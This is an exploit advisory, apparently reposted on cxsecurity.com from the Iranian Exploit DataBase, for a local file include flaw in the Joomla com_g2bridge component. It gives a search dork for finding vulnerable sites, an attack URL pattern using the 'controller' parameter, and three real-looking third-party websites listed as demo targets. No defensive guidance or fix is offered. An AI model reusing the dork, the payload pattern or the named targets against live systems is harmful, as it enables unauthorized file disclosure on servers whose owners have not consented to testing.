Joomla com_g2bridge Components Local File Include vulnerability

2013-06-26 / 2013-06-27
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-98

################################# # Iranian Exploit DataBase # Www.exploit.IrIsT.Ir ################################# # Exploit Title : joomla com_g2bridge Components Local File Include vulnerability # Author : Iranian Exploit DataBase # Discovered By : IeDb # Home : http://exploit.IrIsT.Ir # Software Link : http://www.joomla.org # Security Risk : High # Tested on : Linux # Dork : inurl:index.php?option=com_g2bridge ################################# Exploit : # http://www.Site.com/index.php?option=com_g2bridge&controller=[LFI] # Dem0 : # http://donjohXnstonphotos.com/index.php?option=com_g2bridge&controller=[LFI] # http://www.tillitXomas.com/index.php?option=com_g2bridge&controller=[LFI] # http://www.aXoup.ru/index.php?option=com_g2bridge&controller=[LFI] ################################# # Exploit Archive : http://exploit.irist.ir/exploits-98.html #################################

References:

http://exploit.irist.ir/exploits-98.html


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top